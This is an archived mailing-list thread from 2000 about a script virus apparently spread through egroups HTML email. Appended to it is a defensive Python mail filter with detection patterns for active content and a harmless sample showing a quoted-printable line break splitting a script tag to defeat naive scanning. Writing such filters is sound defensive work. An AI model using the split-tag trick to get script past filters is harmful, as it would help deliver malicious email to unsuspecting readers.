Virus (was Re: [alberg30] A30 article-huge file)
alberg30
alberg30 at interactive.net
Fri Apr 14 19:48:18 PDT 2000
George, how do I turn off scripts? Although I got an email msg that said
there was a virus in the email I sent, I have done a virus scan of my
hard drive but show no sign of the virus. What gives?
----- Original Message -----
From: George Dinwiddie <gdinwiddie at min.net>
To: <alberg30 at egroups.com>
Cc: <support at egroups.com>
Sent: Friday, April 14, 2000 8:45 PM
Subject: Virus (was Re: [alberg30] A30 article-huge file)
> Joe,
>
> Your email contained the same virus that appeared in Towney's
> email on the A30 list. It shows up right above the ad banner
> in the HTML source. I'm beginning to think that perhaps it's
> not your machine and Towney's machine, but egroups' server
> that's infected.
>
> Please, everyone make sure that scripts are turned off in your
> email software. I can't imagine any reason you'd want an
> email to automatically run something on your machine.
>
> - George
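George's note says the script sat in the HTML source of the message, above the ad banner. As an added example (not part of the original thread), this Python check shows how a mail filter can flag active content in an HTML part, and why it has to decode quoted-printable first: a soft line break can split a tag in two. The sample message, its addresses, the all-zero classid and the pattern list are constructed assumptions.

```python
import email
import re
from email import policy

# Active content that has no business in a mail body (assumed pattern list).
ACTIVE = {
    "script tag": re.compile(r"<\s*script\b", re.I),
    "embedded object": re.compile(r"<\s*object\b[^>]*\bclassid\s*=", re.I),
    "HTA application tag": re.compile(r"<\s*hta:application\b", re.I),
    "inline event handler": re.compile(r"<[^>]+\son\w+\s*=", re.I),
}

def find_active_content(raw_message: bytes) -> dict:
    """Return {finding: count} over all text/html parts, after transfer decoding."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = {}
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()  # undoes quoted-printable / base64 and charset
        for name, pattern in ACTIVE.items():
            hits = len(pattern.findall(html))
            if hits:
                findings[name] = findings.get(name, 0) + hits
    return findings

def naive_scan(raw_message: bytes) -> bool:
    """What a plain substring search on the undecoded bytes sees."""
    return b"<script" in raw_message.lower()

# Constructed sample: harmless HTML mail whose script tag is split by a
# quoted-printable soft line break ("=" at end of line).
SAMPLE = (
    b"From: list@example.invalid\r\n"
    b"Subject: constructed sample\r\n"
    b"MIME-Version: 1.0\r\n"
    b"Content-Type: text/html; charset=iso-8859-1\r\n"
    b"Content-Transfer-Encoding: quoted-printable\r\n"
    b"\r\n"
    b"<html><body><p>Hello list</p><scr=\r\n"
    b"ipt>var note=3D\"constructed\";</script>\r\n"
    b"<object id=3D\"x\" classid=3D\"clsid:00000000-0000-0000-0000-000000000000\">=\r\n"
    b"</object></body></html>\r\n"
)

if __name__ == "__main__":
    print("naive scan of raw bytes:", naive_scan(SAMPLE))
    print("scan after decoding:", find_active_content(SAMPLE))
```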